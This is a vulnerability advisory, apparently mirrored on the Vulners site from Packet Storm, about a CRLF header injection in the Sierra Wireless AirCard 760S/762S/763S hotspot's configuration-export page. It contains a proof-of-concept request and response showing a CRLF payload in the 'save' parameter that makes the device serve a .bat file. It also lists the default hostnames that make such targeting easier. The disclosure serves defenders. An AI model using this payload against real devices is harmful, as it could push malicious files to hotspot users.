Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection

🗓️ 14 Jan 2015 00:00:00Reported by Luke WalkerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection allows HTTP header injection, potentially leading to file injection into HTTP responses

Code
`Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection  
  
[*] Overview  
  
Sierra Wireless produces a mobile wi-fi hotspot device that is popular  
amongst telecommunication companies for re-branding to suit local markets.  
  
The AirCard 760S/762S/763S Web-based Administrative Console suffers from a  
HTTP header injection that allows an attacker to inject a file into the  
HTTP response from the device.  
  
[*] Description  
  
The configuration export function allows the name of the exported  
configuration file to be customised, but the parameter "save" is not  
filtered.  
  
http://​<routerURL>/export.cfg?save=export.cfg  
  
  
[*] Traffic sample from POC  
  
(curl -L)  
(sample below tested on firmware SWI9200H2_03.05.11.00AP)  
  
> GET /export.cfg?save=  
> export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a  
> &sessionId=00000001%2DhYL4H  
> 4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1  
> > User-Agent: curl/7.40.0  
> > Host: router.4g  
> > Accept: */*  
> >  
> < HTTP/1.1 200 OK  
> < Server: httpd/2.7 (sierra; D4C)  
> < Date: Mon, 12 Jan 2015 05:32:38 GMT  
> < Connection: keep-alive  
> < Cache-Control: no-cache  
> < Content-Disposition: attachment; filename=export.bat  
> < Content-type: application/bat  
>  
> pause  
  
  
> Content-type: application/octet-stream  
> Transfer-encoding: chunked  
> 3a  
> #  
> # Configuration export from Telstra WI-FI 4G  
> #  
> # Model:  
  
  
[*] Limitations  
  
While it does not require authentication, it does require user interaction  
and knowledge of the hotspot's hostname.  
  
However, the default hotspot names are well-known, based on the OEM'd  
version of the AirCard Mobile Hotspot:  
  
* 763S - Sierra Wireless Original OEM - http://aircard.hotspot  
* 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot  
* 762S - DNA 4G WLAN Mokkula - http://dna.mokkula  
* 760S - Telstra Mobile WiFi 4G - http://telstra.4g  
* 760S - BigPond Mobile - http://bigpond.4g  
  
[*] Workaround  
  
Change the name and IP address of the device to something other than the  
default settings.  
  
[*] Vendor Contact  
  
An attempt to contact both Sierra Wireless and NETGEAR (who seem to own  
support of the device now) was unsuccessful.  
  
​regards  
,  
Luke  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Jan 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
sierra wirelessaircard 760saircard 762saircard 763smobile hotspotcrlf injectionhttp headerfile injectionconfiguration exporthttp responsehotspot hostnamedefault settingsvendor contact
35